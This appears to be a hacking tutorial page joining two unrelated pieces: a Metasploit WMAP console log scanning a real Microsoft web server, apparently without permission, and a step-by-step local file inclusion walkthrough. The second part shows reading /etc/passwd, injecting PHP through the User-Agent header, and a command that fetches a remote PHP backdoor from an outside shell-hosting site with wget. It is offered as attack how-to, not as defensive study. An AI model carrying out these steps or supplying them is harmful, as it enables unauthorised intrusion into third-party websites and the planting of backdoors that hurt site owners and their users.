WMAP WEB SCANNER METASPLOIT

ur0b0r0x@consolex_ /opt/metasploit-4.4.0/msf3 $ msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 951 exploits - 506 auxiliary - 152 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > db_connect -y /opt/metasploit-4.4.0/config/database.yml
msf > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap

msf > wmap_sites -a www.microsoft.com,http://65.55.58.201/
[*] Site created.
msf > wmap_sites -l
[*] Available sites
===============

 Id  Host             Vhost                Port  Proto  # Pages  # Forms
 --  ----             -----                ----  -----  -------  -------
 0   65.55.58.201     www.microsoft.com    80    http   0        0

msf > wmap_sites -s 0 1
    [www.microsoft.com] (65.55.58.201)
msf > wmap_targets -t microsoft.com,http://65.55.58.201/
msf > set DOMIAN www.microsoft.com
DOMIAN => www.microsoft.com
msf > wmap_targets  -d 0
[*] Loading www.microsoft.com,http://65.55.58.201:80/.
msf > wmap_targets  -l
[*] Defined targets
===============

     Id  Vhost              Host          Port  SSL    Path
     --  -----              ----          ----  ---    ----
     0   www.microsoft.com  65.55.58.201  80    false    /

msf > wmap_run -t
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 17:48:50 -0500
[*] Loading wmap modules...

[*] 38 wmap enabled modules loaded.
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] ETC ETC ETC ETC ETC.....
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] ETC ETC ETC ETC ETC.....

 

msf > wmap_run -e
[*] Using ALL wmap enabled modules.
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 18:03:07 -0500
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[*] 65.55.58.201:80 Microsoft-IIS/7.5 ( Powered by ASP.NET, 301-http://www.microsoft.com )
[*] ETC ETC ETC......

msf > hosts -c address,svcs,vulns

Hosts
=====
address        svcs  vulns
-------        ----  -----
65.55.58.201    1     1
msf > vulns
[*] Time: 2012-09-17 18:05:49 UTC Vuln: host=65.55.58.201 port=80 proto=tcp name=auxiliary/scanner/http/options refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561

Local File Inclusion Vulnerability Demonstration - Web Hacking

Local file inclusion is a very popular web application attack, It was very common few years back. However now a days you will rarely find websites vulnerable to this attack. However a single vulnerability can result in getting your website compromised. 

Here are some of the common parameters/dorks which are vulnerable to local file inclusion or remote file inclusion attacks.

index.php?index2=
index.php?homepage=
index.php?page=

 
Requirements:

1) A Vulnerable Website
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.

Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it.

Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further acesss. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is Useragent switcher. Which can be downloaded from the link above. 

The hacker edits the useragent and changes code inside to the user agent to the following:

<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function)

disable_functions | no value | no value

The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command:


<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:

Feel free to query for any issue.